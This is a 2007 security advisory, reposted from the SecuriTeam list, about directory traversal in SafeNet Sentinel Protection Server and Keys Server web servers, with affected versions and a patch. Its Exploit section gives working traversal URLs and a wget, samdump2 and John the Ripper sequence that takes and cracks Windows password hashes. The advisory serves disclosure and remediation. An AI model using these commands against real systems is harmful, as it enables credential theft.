Tuesday, November 27, 2007

[NT] SafeNet Sentinel Protection Server and Keys Server Directory Traversal

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

SafeNet Sentinel Protection Server and Keys Server Directory Traversal
------------------------------------------------------------------------


SUMMARY

SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory traversal
attacks. A remote attacker could exploit these vulnerabilities to read
arbitrary files with the permissions of the web server, typically SYSTEM.

DETAILS

Vulnerable Systems:
* Sentinel Protection Server version 7.0.0 through version 7.4.0 and
possibly below
* Sentinel Keys Server version 1.0.3 and possibly below

Immune Systems:
* Sentinel Protection Server version 7.4.1
* Sentinel Keys Server version 1.0.4

Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key use.
The web server software does not santize request paths correctly before
using them in system calls. As a result, an attacker can request files
outside the web server's directory root by using the ../ notation to refer
to the parent directory of the current directory.

Impact:
A remote attacker could exploit this vulnerability to read sensitive files
on the affected system. Attractive targets include the SAM registry hive
which contains system password hashes.

Solution:
Upgrade to Sentinel Protection Server version 7.4.1 and Sentinel Keys
Server version 1.0.4.

First upgrade the Sentinel Driver software to version 7.4.0 if you are
using an earlier version:
<http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip> http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip

Then install "Security Patch to Sentinel Protection Installer 7.4.0"
<http://safenet-inc.com/support/files/SPI740SecurityPatch.zip>

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip

Exploit:
Most popular web browsers are not be able to display URLs exploiting this
problem. We recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection Server.

This example will retrieve the C:\boot.ini file.
http://XX.XX.XX.XX:6002/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry hive
from the Windows repair folder:
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using
the bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes


ADDITIONAL INFORMATION

The information has been provided by <mailto:ekendall@brandeis.edu>
Elliot Kendall.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment